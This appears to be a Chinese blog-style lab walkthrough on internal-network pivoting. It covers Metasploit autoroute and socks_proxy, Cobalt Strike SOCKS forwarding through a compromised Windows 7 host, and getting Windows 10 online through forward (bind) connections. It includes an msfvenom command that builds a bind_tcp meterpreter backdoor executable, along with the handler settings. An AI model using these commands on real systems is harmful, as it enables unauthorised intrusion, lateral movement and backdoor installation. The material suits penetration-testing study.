内网安全-代理技术-socket协议

小迪安全网络架构图:

背景:当前获取window7 出网主机的shell。

1.使用msf上线,查看路由

run autoroute -p

添加路由:

run post/multi/manage/autoroute

使用socks模块开启节点,作为流量跳板

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set srvport 1122

srvport => 1122

msf6 auxiliary(server/socks_proxy) > run

使用socket cap 进行代理

2.使用cs进行渗透测试

windwos7上线cs木马

点击代理转发选择socket

输入账户密码后,使用proifixer进行流量转发

配置为目标站点走socket5

3.使用cs进行windows10 上线cs

方案:创建木马将数据传递给本地4444端口

使用window7正向连接目标4444端口

cs配置正向监听器:

生成木马:

模拟执行木马,在windows7交互会话窗口:

connect 192.168.11.129 4444 即可上线

4.使用msf进行windows10 上线

生成正向连接后门:msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=2222 -f exe > bd.exe

放置windows10上运行

msf执行:

msf6 exploit(multi/handler) > use exploit/multi/handler

\*\] Using configured payload windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) \> set payload windows/meterpreter/bind_tcp payload =\> windows/meterpreter/bind_tcp msf6 exploit(multi/handler) \> set rhost 192.168.11.129 rhost =\> 192.168.11.129 msf6 exploit(multi/handler) \> set lport 2222 lport =\> 2222 msf6 exploit(multi/handler) \> run

相关推荐
zskj_zhyl2 小时前
家庭健康能量站:微高压氧舱结合艾灸机器人,智享双重养生SPA
人工智能·科技·安全·机器人
肥仔哥哥19302 小时前
安全设计-防止非法移机
安全·非法移机·自助机的安全设计·设备的安全设计
网络安全创新研究院5 小时前
飞网揭秘:个人网络与团队网络功能对比
安全
Warren987 小时前
软件测试-Selenium学习笔记
java·javascript·笔记·学习·selenium·测试工具·安全
字节跳动安全中心7 小时前
智能体防御 | 一文了解3种系统提示词加固方法
安全·llm
黑客影儿11 小时前
黑客哲学之学习笔记系列(三)
笔记·学习·程序人生·安全·职场和发展·网络攻击模型·学习方法
XY_墨莲伊11 小时前
【网络安全实验报告】实验六: 病毒防护实验
安全·web安全
厦门辰迈智慧科技有限公司12 小时前
水闸安全综合监测系统解决方案
网络·物联网·安全·自动化·监测
深盾安全12 小时前
Python脚本安全防护策略全解析(下)
安全
叫我阿柒啊13 小时前
自学渗透,学会五分钟安装DVWA漏洞靶场
后端·安全